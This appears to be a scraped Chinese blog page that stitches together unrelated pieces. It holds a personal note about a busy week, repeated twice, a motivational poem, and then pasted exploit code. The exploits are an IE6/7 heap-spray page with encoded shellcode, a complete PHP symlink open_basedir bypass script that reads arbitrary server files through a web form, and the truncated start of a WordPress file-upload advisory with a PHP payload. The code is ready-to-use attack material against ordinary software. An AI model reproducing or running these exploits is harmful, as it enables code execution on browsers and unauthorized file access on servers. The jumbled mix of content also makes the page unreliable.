突然发现今天已经星期四了,这周又要完了,最近一段时间可谓是真的很忙,PC竞品,手机竞品,还有两周就要交报告了:( 昨天忙的连饭都没有顾的上,再这里要谢谢晶晶的米饭,马莉的米皮,超超的汉堡,好感动!
突然发现今天已经星期四了,这周又要完了,最近一段时间可谓是真的很忙,PC竞品,手机竞品,还有两周就要交报告了:( 昨天忙的连饭都没有顾的上,再这里要谢谢晶晶的米饭,马莉的米皮,超超的汉堡,好感动!
感谢伤害我们的人, 因为他磨练了我们的心志。
感谢欺骗我们的人, 因为他增进了我们的智慧。
感谢中伤我们的人, 因为他磨砺了我们的人格。
感谢斥责我们的人, 因为他提醒了我们的缺点。
IE6/7 CSS 处理拒绝服务
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<!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <script> function load(){ var e; e=document.getElementsByTagName("STYLE")[0]; e.outerHTML="1"; } </script> <STYLE type="text/css"> body{ overflow: scroll; margin: 0; } </style> <SCRIPT language="javascript"> var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EEu99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB0%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<4000; x++) memory[x] = block + shellcode; </script> </HEAD> <BODY onload="load()"> </BODY> </HTML> |
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<?php /* PHP 5.2.11/5.3.0 symlink() open_basedir bypass by Maksymilian Arciemowicz http://securityreason.com/ cxib [ a.T] securityreason [ d0t] com CHUJWAMWMUZG */ $fakedir="cx"; $fakedep=16; $num=0; // offset of symlink.$num if(!empty($_GET['file'])) $file=$_GET['file']; else if(!empty($_POST['file'])) $file=$_POST['file']; else $file=""; echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs. Author : Maksymilian Arciemowicz <p>Script for legal use only. <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass <p>More: <a href="http://securityreason.com/">SecurityReason</a> <p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF "]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>'; if(empty($file)) exit; if(!is_writable(".")) die("not writable directory"); $level=0; for($as=0;$as<$fakedep;$as++){ if(!file_exists($fakedir)) mkdir($fakedir); chdir($fakedir); } while(1<$as--) chdir(".."); $hardstyle = explode("/", $file); for($a=0;$a<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]); chdir($hardstyle[$a]); $as++; } } $as++; while($as--) chdir(".."); @rmdir("fakesymlink"); @unlink("fakesymlink"); @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); // this loop will skip allready created symlinks. while(1) if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break; else $num++; @unlink("fakesymlink"); mkdir("fakesymlink"); die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); ?> |
Browser is enough to replicate this issue. Simply log in to your wordpress blog as a low privileged
user or admin. Create a new post and use the media file upload feature to upload a file:
containing the following code:
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<?php phpinfo(); ?> |
After the upload …